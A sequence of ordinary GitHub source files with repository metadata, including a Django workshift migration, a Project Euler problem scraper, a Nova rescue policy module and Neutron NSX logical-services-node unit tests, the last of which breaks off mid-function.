suite = unittest.defaultTestLoader.discover(os.getcwd())
unittest.TextTestRunner().run(suite)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Manage data for software packages.")
subparsers = parser.add_subparsers(help="Sub-commands for managing data", dest='command')
for command in COMMANDS.keys():
# Create a parser for each top-level command, with subparsers for each module
command_spec = COMMANDS[command]
command_parser = subparsers.add_parser(command, description=command_spec['description'])
command_subparsers = command_parser.add_subparsers(help=command_spec['module_help'])
# Initialize arguments for each module of each command
for module in command_spec['modules']:
# Create a parser for each low-level module
module_basename = module.__name__.split('.')[-1]
module_parser = command_subparsers.add_parser(module_basename)
# Add default arguments for each fetcher (database configuration)
module_parser.add_argument(
'--db',
default='sqlite',
help="which type of database to use (postgres, sqlite). Defaults to sqlite."
)
module_parser.add_argument(
'--db-config',
help="Name of file containing database configuration."
)
# Each module defines additional arguments
module.configure_parser(module_parser)
module_parser.set_defaults(func=module.main)
# Add command for running unit tests
test_parser = subparsers.add_parser('tests', description="Run unit tests.")
test_parser.set_defaults(func=run_tests)
# Parse arguments
args = parser.parse_args()
# Initialize database
if args.command != 'tests':
init_database(args.db, config_filename=args.db_config)
create_tables()
# Invoke the main program that was specified by the submodule
if args.func is not None:
args.func(**vars(args))
|
{
"content_hash": "6c702d54b24a28e5d183a6299ed41960",
"timestamp": "",
"source": "github",
"line_count": 119,
"max_line_length": 98,
"avg_line_length": 38.21848739495798,
"alnum_prop": 0.6561125769569042,
"repo_name": "andrewhead/Package-Qualifiers",
"id": "71d2389b433f1a05494041ae980b3d4fefb3e5c0",
"size": "4596",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "data.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "142908"
},
{
"name": "Shell",
"bytes": "782"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import models, migrations
import workshift.fields
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('managers', '0002_auto_20140801_1108'),
]
operations = [
migrations.CreateModel(
name='InstanceInfo',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(help_text='Title for this shift.', max_length=255, null=True, blank=True)),
('description', models.TextField(help_text='Description of the shift.', null=True, blank=True)),
('verify', models.CharField(default='O', help_text='Who is able to mark this shift as completed.', max_length=1, choices=[('W', 'Workshift Managers only'), ('P', 'Pool Managers only'), ('M', 'Any Manager'), ('O', 'Another member'), ('S', 'Any member (including self)'), ('A', 'Automatically verified')])),
('start_time', models.TimeField(help_text='Start time for this workshift.', null=True, blank=True)),
('end_time', models.TimeField(help_text='End time for this workshift.', null=True, blank=True)),
('week_long', models.BooleanField(default=False, help_text='If this shift is for the entire week.')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='PoolHours',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('hours', models.DecimalField(default=5, help_text='Periodic hour requirement.', max_digits=5, decimal_places=2)),
('standing', models.DecimalField(default=0, help_text='Current hours standing, below or above requirement.', max_digits=5, decimal_places=2)),
('hour_adjustment', models.DecimalField(default=0, help_text='Manual hour requirement adjustment.', max_digits=5, decimal_places=2)),
('last_updated', models.DateTimeField(help_text="When the last time the system updated this workshifter's standings.", null=True, blank=True)),
('first_date_standing', models.DecimalField(decimal_places=2, default=0, max_digits=5, blank=True, help_text='The hourly fines or repayment at the first fine date. Stored in a field for manual adjustment.', null=True)),
('second_date_standing', models.DecimalField(decimal_places=2, default=0, max_digits=5, blank=True, help_text='The hourly fines or repayment at the second fine date. Stored in a field for manual adjustment.', null=True)),
('third_date_standing', models.DecimalField(decimal_places=2, default=0, max_digits=5, blank=True, help_text='The hourly fines or repayment at the third fine date. Stored in a field for manual adjustment.', null=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='RegularWorkshift',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('day', workshift.fields.DayField(blank=True, max_length=1, null=True, help_text='The day of the week when this workshift takes place.', choices=[(0, 'Monday'), (1, 'Tuesday'), (2, 'Wednesday'), (3, 'Thursday'), (4, 'Friday'), (5, 'Saturday'), (6, 'Sunday')])),
('count', models.PositiveSmallIntegerField(default=1, help_text='Number of instances to create with each occurrence.', max_length=4)),
('hours', models.DecimalField(default=5, help_text='Number of hours for this shift.', max_digits=5, decimal_places=2)),
('active', models.BooleanField(default=True, help_text='Whether this shift is actively being used currently (displayed in list of shifts, given hours, etc.).')),
('start_time', models.TimeField(help_text='Start time for this workshift.', null=True, blank=True)),
('end_time', models.TimeField(help_text='End time for this workshift.', null=True, blank=True)),
('verify', models.CharField(default='O', help_text='Who is able to mark this shift as completed.', max_length=1, choices=[('W', 'Workshift Managers only'), ('P', 'Pool Managers only'), ('M', 'Any Manager'), ('O', 'Another member'), ('S', 'Any member (including self)'), ('A', 'Automatically verified')])),
('week_long', models.BooleanField(default=False, help_text='If this shift is for the entire week.')),
('addendum', models.TextField(default='', help_text='Addendum to the description for this workshift.')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Semester',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('season', models.CharField(default='Sp', help_text='Season of the year (spring, summer, fall) of this semester.', max_length=2, choices=[('Sp', 'Spring'), ('Su', 'Summer'), ('Fa', 'Fall')])),
('year', models.PositiveSmallIntegerField(help_text='Year of this semester.', max_length=4)),
('rate', models.DecimalField(help_text='Workshift rate for this semester.', null=True, max_digits=7, decimal_places=2, blank=True)),
('policy', models.URLField(help_text='Link to the workshift policy for this semester.', max_length=255, null=True, blank=True)),
('start_date', models.DateField(help_text='Start date of this semester.')),
('end_date', models.DateField(help_text='End date of this semester.')),
('preferences_open', models.BooleanField(default=False, help_text='Whether members can enter their workshift preferences.')),
('current', models.BooleanField(default=True, help_text='If this semester is the current semester.')),
('workshift_managers', models.ManyToManyField(to=settings.AUTH_USER_MODEL, blank=True)),
],
options={
'ordering': ['-start_date'],
},
bases=(models.Model,),
),
migrations.AlterUniqueTogether(
name='semester',
unique_together=set([('season', 'year')]),
),
migrations.CreateModel(
name='ShiftLogEntry',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('entry_time', models.DateTimeField(help_text='Time this entry was made.', auto_now_add=True)),
('hours', models.DecimalField(help_text='Hours associated with a change in workshift credit.', null=True, max_digits=5, decimal_places=2, blank=True)),
('note', models.TextField(help_text="Message to the workshift manager. (e.g. 'Can't cook because of flu')", null=True, blank=True)),
('entry_type', models.CharField(default='V', max_length=1, choices=[('A', 'Assigned'), ('B', 'Blown'), ('I', 'Sign In'), ('O', 'Sign Out'), ('V', 'Verify'), ('M', 'Modify Hours'), ('S', 'Sell')])),
],
options={
'ordering': ['-entry_time'],
},
bases=(models.Model,),
),
migrations.CreateModel(
name='TimeBlock',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('preference', models.PositiveSmallIntegerField(default=0, help_text="The user's preference for this time block.", max_length=1, choices=[(0, 'Busy'), (1, 'Preferred')])),
('day', workshift.fields.DayField(help_text='Day of the week for this time block.', max_length=1, choices=[(0, 'Monday'), (1, 'Tuesday'), (2, 'Wednesday'), (3, 'Thursday'), (4, 'Friday'), (5, 'Saturday'), (6, 'Sunday')])),
('start_time', models.TimeField(help_text='Start time for this time block.')),
('end_time', models.TimeField(help_text='End time for this time block.')),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='WorkshiftInstance',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date', models.DateField(help_text='Date of this workshift.')),
('closed', models.BooleanField(default=False, help_text='If this shift has been completed.')),
('blown', models.BooleanField(default=False, help_text='If this shift has been blown.')),
('intended_hours', models.DecimalField(default=5, help_text='Intended hours given for this shift.', max_digits=5, decimal_places=2)),
('hours', models.DecimalField(default=5, help_text='Number of hours actually given for this shift.', max_digits=5, decimal_places=2)),
('info', models.ForeignKey(blank=True, to='workshift.InstanceInfo', help_text='The weekly workshift of which this is an instance.', null=True)),
('logs', models.ManyToManyField(to='workshift.ShiftLogEntry', blank=True)),
('semester', models.ForeignKey(help_text='The semester for this workshift.', to='workshift.Semester')),
('weekly_workshift', models.ForeignKey(blank=True, to='workshift.RegularWorkshift', help_text='The weekly workshift of which this is an instance.', null=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='WorkshiftPool',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(default='Regular Workshift', help_text='The title of this workshift pool (i.e. HI Hours)', max_length=100)),
('sign_out_cutoff', models.PositiveSmallIntegerField(default=24, help_text='Cutoff for signing out of workshifts without requiring a substitute, in hours.')),
('verify_cutoff', models.PositiveSmallIntegerField(default=8, help_text='Cutoff for verifying a workshift after it has finished, in hours. After this cutoff, the shift will be marked as blown.')),
('hours', models.DecimalField(default=5, help_text='Default hours required per member per period (e.g., 2 weeks per period and 2 hours required per period means 2 hours required every two weeks).', max_digits=5, decimal_places=2)),
('weeks_per_period', models.PositiveSmallIntegerField(default=1, help_text='Number of weeks for requirement period (e.g., 2 weeks per period and 2 hours required per period means 2 hours required every two weeks). 0 makes this a semesterly requirement')),
('first_fine_date', models.DateField(help_text='First fine date for this semester, optional.', null=True, blank=True)),
('second_fine_date', models.DateField(help_text='Second fine date for this semester, optional.', null=True, blank=True)),
('third_fine_date', models.DateField(help_text='Third fine date for this semester, optional.', null=True, blank=True)),
('any_blown', models.BooleanField(default=False, help_text='If any member is allowed to mark a shift as blown.')),
('is_primary', models.BooleanField(default=False, help_text='Is the primary workshift pool for the house.')),
('managers', models.ManyToManyField(to='managers.Manager', blank=True)),
('semester', models.ForeignKey(help_text='The semester associated with this pool of workshift hours.', to='workshift.Semester')),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='regularworkshift',
name='pool',
field=models.ForeignKey(help_text='The workshift pool for this shift.', to='workshift.WorkshiftPool'),
preserve_default=True,
),
migrations.AddField(
model_name='poolhours',
name='pool',
field=models.ForeignKey(help_text='The pool associated with these hours.', to='workshift.WorkshiftPool'),
preserve_default=True,
),
migrations.AddField(
model_name='instanceinfo',
name='pool',
field=models.ForeignKey(blank=True, to='workshift.WorkshiftPool', help_text='The workshift pool for this shift.', null=True),
preserve_default=True,
),
migrations.AlterUniqueTogether(
name='workshiftpool',
unique_together=set([('semester', 'title')]),
),
migrations.CreateModel(
name='WorkshiftProfile',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('note', models.TextField(help_text='Note for this profile. For communication between the workshifter and the workshift manager(s).', null=True, blank=True)),
('preference_save_time', models.DateTimeField(help_text='The time this member first saved their preferences.', null=True, blank=True)),
('pool_hours', models.ManyToManyField(to='workshift.PoolHours', blank=True)),
('semester', models.ForeignKey(help_text='The semester for this workshift profile.', to='workshift.Semester')),
('time_blocks', models.ManyToManyField(to='workshift.TimeBlock', blank=True)),
('user', models.ForeignKey(help_text='The user for this workshift profile.', to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='workshiftinstance',
name='workshifter',
field=models.ForeignKey(blank=True, to='workshift.WorkshiftProfile', help_text='Workshifter who was signed into this shift at the time it started.', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='workshiftinstance',
name='verifier',
field=models.ForeignKey(blank=True, to='workshift.WorkshiftProfile', help_text='Workshifter who verified that this shift was completed.', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='workshiftinstance',
name='liable',
field=models.ForeignKey(blank=True, to='workshift.WorkshiftProfile', help_text='Workshifter who is liable for this shift if no one else signs in.', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='shiftlogentry',
name='person',
field=models.ForeignKey(blank=True, to='workshift.WorkshiftProfile', help_text='Person who made this entry.', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='regularworkshift',
name='current_assignees',
field=models.ManyToManyField(to='workshift.WorkshiftProfile', blank=True),
preserve_default=True,
),
migrations.CreateModel(
name='WorkshiftRating',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('rating', models.PositiveSmallIntegerField(default=1, help_text='Rating for the workshift type.', max_length=1, choices=[(0, 'Dislike'), (1, 'Indifferent'), (2, 'Like')])),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='workshiftprofile',
name='ratings',
field=models.ManyToManyField(to='workshift.WorkshiftRating', blank=True),
preserve_default=True,
),
migrations.AlterUniqueTogether(
name='workshiftprofile',
unique_together=set([('user', 'semester')]),
),
migrations.CreateModel(
name='WorkshiftType',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(help_text='The title of this workshift type (e.g., "Pots"), must be unique.', unique=True, max_length=255)),
('description', models.TextField(help_text='A description for this workshift type.', null=True, blank=True)),
('quick_tips', models.TextField(help_text='Quick tips to the workshifter.', null=True, blank=True)),
('rateable', models.BooleanField(default=True, help_text='Whether this workshift type is shown in preferences.')),
('assignment', models.CharField(default='A', help_text='How assignment to this workshift works. This can be automatic, manual-only, or no assignment (i.e. Manager shifts, which are internally assigned.', max_length=1, choices=[('A', 'Auto-assign'), ('M', 'Manually assign'), ('O', 'No assignment')])),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='workshiftrating',
name='workshift_type',
field=models.ForeignKey(help_text='The workshift type being rated.', to='workshift.WorkshiftType'),
preserve_default=True,
),
migrations.AddField(
model_name='regularworkshift',
name='workshift_type',
field=models.ForeignKey(help_text='The workshift type for this weekly workshift.', to='workshift.WorkshiftType'),
preserve_default=True,
),
]
|
{
"content_hash": "6f7aa4aa6b113e1cf3917f5550c3d093",
"timestamp": "",
"source": "github",
"line_count": 267,
"max_line_length": 321,
"avg_line_length": 68.42696629213484,
"alnum_prop": 0.6079365079365079,
"repo_name": "knagra/farnsworth",
"id": "786a674727648b4347e20eb7e42a6f227e486843",
"size": "18294",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "workshift/migrations/0001_initial.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "189846"
},
{
"name": "HTML",
"bytes": "3022838"
},
{
"name": "JavaScript",
"bytes": "936810"
},
{
"name": "PHP",
"bytes": "2274"
},
{
"name": "Python",
"bytes": "742542"
}
],
"symlink_target": ""
}
|
"""Extracts Problem definitions from projecteuler.net and saves each to seperate
file with common Python Template"""
from __future__ import print_function
import urllib2
import sys
from bs4 import BeautifulSoup
def main():
if len(sys.argv) != 3:
print('usage: ./eulergen.py <start problem number> <end problem number>')
sys.exit(1)
start = int(sys.argv[1])
end = int(sys.argv[2])
for i in range(start, end + 1):
url = ('http://projecteuler.net/problem=' + str(i))
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html)
title = soup.h2.get_text() # gets title
file_name = str(i) + '_' + title.lower(
).replace(" ", "_").join('.py') # lowercases it and removes whitespace
problem_definition = '\n'.join(
[tag.get_text() for tag in soup.find_all('p')])
template = '''
#!/usr/bin/python
"""
%s
%s
"""
def main():
if __name__ == '__main__':
main()
''' % (title, problem_definition)
f = open(filename, 'w')
f.write(template)
f.close()
print('Created file %s succesfully' % filename)
if __name__ == '__main__':
main()
|
{
"content_hash": "0bf7c106f5ba57869ac05e02492543c4",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 81,
"avg_line_length": 24.137254901960784,
"alnum_prop": 0.5637692932575142,
"repo_name": "sai-prasanna/python-scripts",
"id": "4738e4b898d68584e8273a01269a7c8091ec4f20",
"size": "1249",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "eulergen/python2/eulergen.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7464"
}
],
"symlink_target": ""
}
|
from rqalpha.api import api_base, api_extension
def get_apis():
apis = {name: getattr(api_base, name) for name in api_base.__all__}
apis.update((name, getattr(api_extension, name)) for name in api_extension.__all__)
return apis
|
{
"content_hash": "12e8a22764d555f45541d1b506fd276c",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 87,
"avg_line_length": 34.57142857142857,
"alnum_prop": 0.6818181818181818,
"repo_name": "xclxxl414/rqalpha",
"id": "f4c057b06039822736a7d4fa3927957a27b61e9f",
"size": "847",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rqalpha/api/helper.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "2333905"
},
{
"name": "Python",
"bytes": "2597438"
},
{
"name": "Shell",
"bytes": "1154"
}
],
"symlink_target": ""
}
|
"""
Created on 2017-4-25
@author: cheng.li
"""
from alphamind.data.neutralize import neutralize
from alphamind.data.rank import rank
from alphamind.data.standardize import standardize
from alphamind.data.winsorize import winsorize_normal as winsorize
__all__ = ['standardize',
'winsorize',
'neutralize',
'rank']
|
{
"content_hash": "fcb98ce2d9d2d6a4138428c342686411",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 66,
"avg_line_length": 24.2,
"alnum_prop": 0.6694214876033058,
"repo_name": "wegamekinglc/alpha-mind",
"id": "a15dcf3cadd9ae5f02598c0736544137a6c639c8",
"size": "388",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "alphamind/data/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "300425"
},
{
"name": "C++",
"bytes": "8627875"
},
{
"name": "CMake",
"bytes": "102"
},
{
"name": "Jupyter Notebook",
"bytes": "2257816"
},
{
"name": "Objective-C",
"bytes": "85"
},
{
"name": "Python",
"bytes": "323052"
},
{
"name": "SourcePawn",
"bytes": "2021"
}
],
"symlink_target": ""
}
|
from oslo_policy import policy
from nova.policies import base
BASE_POLICY_NAME = 'os_compute_api:os-rescue'
UNRESCUE_POLICY_NAME = 'os_compute_api:os-unrescue'
DEPRECATED_REASON = """
Rescue/Unrescue API policies are made granular with new policy
for unrescue and keeping old policy for rescue.
"""
DEPRECATED_POLICY = policy.DeprecatedRule(
'os_compute_api:os-rescue',
base.RULE_ADMIN_OR_OWNER,
deprecated_reason=DEPRECATED_REASON,
deprecated_since='21.0.0'
)
rescue_policies = [
policy.DocumentedRuleDefault(
name=BASE_POLICY_NAME,
check_str=base.PROJECT_MEMBER_OR_ADMIN,
description="Rescue a server",
operations=[
{
'path': '/servers/{server_id}/action (rescue)',
'method': 'POST'
},
],
scope_types=['project']),
policy.DocumentedRuleDefault(
name=UNRESCUE_POLICY_NAME,
check_str=base.PROJECT_MEMBER_OR_ADMIN,
description="Unrescue a server",
operations=[
{
'path': '/servers/{server_id}/action (unrescue)',
'method': 'POST'
}
],
scope_types=['project'],
deprecated_rule=DEPRECATED_POLICY
),
]
def list_rules():
return rescue_policies
|
{
"content_hash": "19ae4cb22a3c5113ad51880110404dd2",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 65,
"avg_line_length": 25.41176470588235,
"alnum_prop": 0.6041666666666666,
"repo_name": "openstack/nova",
"id": "f9f72e92ef338396376177deda99797f7226fc5e",
"size": "1935",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "nova/policies/rescue.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "3545"
},
{
"name": "Mako",
"bytes": "1952"
},
{
"name": "Python",
"bytes": "23261880"
},
{
"name": "Shell",
"bytes": "28113"
},
{
"name": "Smarty",
"bytes": "507244"
}
],
"symlink_target": ""
}
|
import json
import mock
from neutron.common import exceptions
from neutron.plugins.nicira.common import exceptions as nvp_exc
from neutron.plugins.nicira.common import utils
from neutron.plugins.nicira.nsxlib import lsn as lsnlib
from neutron.plugins.nicira import NvpApiClient
from neutron.tests import base
class LSNTestCase(base.BaseTestCase):
def setUp(self):
super(LSNTestCase, self).setUp()
self.mock_request_p = mock.patch.object(lsnlib, 'do_request')
self.mock_request = self.mock_request_p.start()
self.cluster = mock.Mock()
self.cluster.default_service_cluster_uuid = 'foo'
self.addCleanup(self.mock_request_p.stop)
def test_service_cluster_None(self):
self.mock_request.return_value = None
expected = lsnlib.service_cluster_exists(None, None)
self.assertFalse(expected)
def test_service_cluster_found(self):
self.mock_request.return_value = {
"results": [
{
"_href": "/ws.v1/service-cluster/foo_uuid",
"display_name": "foo_name",
"uuid": "foo_uuid",
"tags": [],
"_schema": "/ws.v1/schema/ServiceClusterConfig",
"gateways": []
}
],
"result_count": 1
}
expected = lsnlib.service_cluster_exists(None, 'foo_uuid')
self.assertTrue(expected)
def test_service_cluster_not_found(self):
self.mock_request.side_effect = exceptions.NotFound()
expected = lsnlib.service_cluster_exists(None, 'foo_uuid')
self.assertFalse(expected)
def test_lsn_for_network_create(self):
net_id = "foo_network_id"
tags = utils.get_tags(n_network_id=net_id)
obj = {"service_cluster_uuid": "foo", "tags": tags}
lsnlib.lsn_for_network_create(self.cluster, net_id)
self.mock_request.assert_called_once_with(
"POST", "/ws.v1/lservices-node",
json.dumps(obj), cluster=self.cluster)
def test_lsn_for_network_get(self):
net_id = "foo_network_id"
lsn_id = "foo_lsn_id"
self.mock_request.return_value = {
"results": [{"uuid": "foo_lsn_id"}],
"result_count": 1
}
result = lsnlib.lsn_for_network_get(self.cluster, net_id)
self.assertEqual(lsn_id, result)
self.mock_request.assert_called_once_with(
"GET",
("/ws.v1/lservices-node?fields=uuid&tag_scope="
"n_network_id&tag=%s" % net_id),
cluster=self.cluster)
def test_lsn_for_network_get_none(self):
net_id = "foo_network_id"
self.mock_request.return_value = {
"results": [{"uuid": "foo_lsn_id1"}, {"uuid": "foo_lsn_id2"}],
"result_count": 2
}
result = lsnlib.lsn_for_network_get(self.cluster, net_id)
self.assertIsNone(result)
def test_lsn_for_network_get_raise_not_found(self):
net_id = "foo_network_id"
self.mock_request.return_value = {
"results": [], "result_count": 0
}
self.assertRaises(exceptions.NotFound,
lsnlib.lsn_for_network_get,
self.cluster, net_id)
def test_lsn_delete(self):
lsn_id = "foo_id"
lsnlib.lsn_delete(self.cluster, lsn_id)
self.mock_request.assert_called_once_with(
"DELETE",
"/ws.v1/lservices-node/%s" % lsn_id, cluster=self.cluster)
def _test_lsn_port_host_entries_update(self, lsn_type, hosts_data):
lsn_id = 'foo_lsn_id'
lsn_port_id = 'foo_lsn_port_id'
lsnlib.lsn_port_host_entries_update(
self.cluster, lsn_id, lsn_port_id, lsn_type, hosts_data)
self.mock_request.assert_called_once_with(
'PUT',
'/ws.v1/lservices-node/%s/lport/%s/%s' % (lsn_id,
lsn_port_id,
lsn_type),
json.dumps({'hosts': hosts_data}),
cluster=self.cluster)
def test_lsn_port_dhcp_entries_update(self):
hosts_data = [{"ip_address": "11.22.33.44",
"mac_address": "aa:bb:cc:dd:ee:ff"},
{"ip_address": "44.33.22.11",
"mac_address": "ff:ee:dd:cc:bb:aa"}]
self._test_lsn_port_host_entries_update("dhcp", hosts_data)
def test_lsn_port_metadata_entries_update(self):
hosts_data = [{"ip_address": "11.22.33.44",
"device_id": "foo_vm_uuid"}]
self._test_lsn_port_host_entries_update("metadata-proxy", hosts_data)
def test_lsn_port_create(self):
port_data = {
"ip_address": "1.2.3.0/24",
"mac_address": "aa:bb:cc:dd:ee:ff",
"subnet_id": "foo_subnet_id"
}
port_id = "foo_port_id"
self.mock_request.return_value = {"uuid": port_id}
lsn_id = "foo_lsn_id"
result = lsnlib.lsn_port_create(self.cluster, lsn_id, port_data)
self.assertEqual(result, port_id)
tags = utils.get_tags(n_subnet_id=port_data["subnet_id"],
n_mac_address=port_data["mac_address"])
port_obj = {
"ip_address": port_data["ip_address"],
"mac_address": port_data["mac_address"],
"type": "LogicalServicesNodePortConfig",
"tags": tags
}
self.mock_request.assert_called_once_with(
"POST", "/ws.v1/lservices-node/%s/lport" % lsn_id,
json.dumps(port_obj), cluster=self.cluster)
def test_lsn_port_delete(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_port_id"
lsnlib.lsn_port_delete(self.cluster, lsn_id, lsn_port_id)
self.mock_request.assert_called_once_with(
"DELETE",
"/ws.v1/lservices-node/%s/lport/%s" % (lsn_id, lsn_port_id),
cluster=self.cluster)
def test_lsn_port_get_with_filters(self):
lsn_id = "foo_lsn_id"
port_id = "foo_port_id"
filters = {"tag": "foo_tag", "tag_scope": "foo_scope"}
self.mock_request.return_value = {
"results": [{"uuid": port_id}],
"result_count": 1
}
result = lsnlib._lsn_port_get(self.cluster, lsn_id, filters)
self.assertEqual(result, port_id)
self.mock_request.assert_called_once_with(
"GET",
("/ws.v1/lservices-node/%s/lport?fields=uuid&tag_scope=%s&"
"tag=%s" % (lsn_id, filters["tag_scope"], filters["tag"])),
cluster=self.cluster)
def test_lsn_port_get_with_filters_return_none(self):
self.mock_request.return_value = {
"results": [{"uuid": "foo1"}, {"uuid": "foo2"}],
"result_count": 2
}
result = lsnlib._lsn_port_get(self.cluster, "lsn_id", None)
self.assertIsNone(result)
def test_lsn_port_get_with_filters_raises_not_found(self):
self.mock_request.return_value = {"results": [], "result_count": 0}
self.assertRaises(exceptions.NotFound,
lsnlib._lsn_port_get,
self.cluster, "lsn_id", None)
def test_lsn_port_plug_network(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
lswitch_port_id = "foo_lswitch_port_id"
lsnlib.lsn_port_plug_network(
self.cluster, lsn_id, lsn_port_id, lswitch_port_id)
self.mock_request.assert_called_once_with(
"PUT",
("/ws.v1/lservices-node/%s/lport/%s/"
"attachment") % (lsn_id, lsn_port_id),
json.dumps({"peer_port_uuid": lswitch_port_id,
"type": "PatchAttachment"}),
cluster=self.cluster)
def test_lsn_port_plug_network_raise_conflict(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
lswitch_port_id = "foo_lswitch_port_id"
self.mock_request.side_effect = NvpApiClient.Conflict
self.assertRaises(
nvp_exc.LsnConfigurationConflict,
lsnlib.lsn_port_plug_network,
self.cluster, lsn_id, lsn_port_id, lswitch_port_id)
def _test_lsn_port_dhcp_configure(
self, lsn_id, lsn_port_id, is_enabled, opts):
lsnlib.lsn_port_dhcp_configure(
self.cluster, lsn_id, lsn_port_id, is_enabled, opts)
opt_array = ["%s=%s" % (key, val) for key, val in opts.iteritems()]
self.mock_request.assert_has_calls([
mock.call("PUT", "/ws.v1/lservices-node/%s/dhcp" % lsn_id,
json.dumps({"enabled": is_enabled}),
cluster=self.cluster),
mock.call("PUT",
("/ws.v1/lservices-node/%s/"
"lport/%s/dhcp") % (lsn_id, lsn_port_id),
json.dumps({"options": {"options": opt_array}}),
cluster=self.cluster)
])
def test_lsn_port_dhcp_configure_empty_opts(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
is_enabled = False
opts = {}
self._test_lsn_port_dhcp_configure(
lsn_id, lsn_port_id, is_enabled, opts)
def test_lsn_port_dhcp_configure_with_opts(self):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
is_enabled = True
opts = {"opt1": "val1", "opt2": "val2"}
self._test_lsn_port_dhcp_configure(
lsn_id, lsn_port_id, is_enabled, opts)
def _test_lsn_metadata_configure(
self, lsn_id, is_enabled, opts, expected_opts):
lsnlib.lsn_metadata_configure(
self.cluster, lsn_id, is_enabled, opts)
lsn_obj = {"enabled": is_enabled}
lsn_obj.update(expected_opts)
self.mock_request.assert_has_calls([
mock.call("PUT",
"/ws.v1/lservices-node/%s/metadata-proxy" % lsn_id,
json.dumps(lsn_obj),
cluster=self.cluster),
])
def test_lsn_port_metadata_configure_empty_secret(self):
lsn_id = "foo_lsn_id"
is_enabled = True
opts = {
"metadata_server_ip": "1.2.3.4",
"metadata_server_port": "8775"
}
expected_opts = {
"metadata_server_ip": "1.2.3.4",
"metadata_server_port": "8775",
"misc_options": []
}
self._test_lsn_metadata_configure(
lsn_id, is_enabled, opts, expected_opts)
def test_lsn_metadata_configure_with_secret(self):
lsn_id = "foo_lsn_id"
is_enabled = True
opts = {
"metadata_server_ip": "1.2.3.4",
"metadata_server_port": "8775",
"metadata_proxy_shared_secret": "foo_secret"
}
expected_opts = {
"metadata_server_ip": "1.2.3.4",
"metadata_server_port": "8775",
"misc_options": ["metadata_proxy_shared_secret=foo_secret"]
}
self._test_lsn_metadata_configure(
lsn_id, is_enabled, opts, expected_opts)
def _test_lsn_port_host_action(
self, lsn_port_action_func, extra_action, action, host):
lsn_id = "foo_lsn_id"
lsn_port_id = "foo_lsn_port_id"
lsn_port_action_func(self.cluster, lsn_id, lsn_port_id, host)
self.mock_request.assert_called_once_with(
"POST",
("/ws.v1/lservices-node/%s/lport/"
"%s/%s?action=%s") % (lsn_id, lsn_port_id, extra_action, action),
json.dumps(host), cluster=self.cluster)
def test_lsn_port_dhcp_host_add(self):
host = {
"ip_address": "1.2.3.4",
"mac_address": "aa:bb:cc:dd:ee:ff"
}
self._test_lsn_port_host_action(
lsnlib.lsn_port_dhcp_host_add, "dhcp", "add_host", host)
def test_lsn_port_dhcp_host_remove(self):
host = {
"ip_address": "1.2.3.4",
"mac_address": "aa:bb:cc:dd:ee:ff"
}
self._test_lsn_port_host_action(
lsnlib.lsn_port_dhcp_host_remove, "dhcp", "remove_host", host)
def test_lsn_port_metadata_host_add(self):
host = {
"ip_address": "1.2.3.4",
"instance_id": "foo_instance_id"
}
self._test_lsn_port_host_action(lsnlib.lsn_port_metadata_host_add,
"metadata-proxy", "add_host", host)
def test_lsn_port_metadata_host_remove(self):
host = {
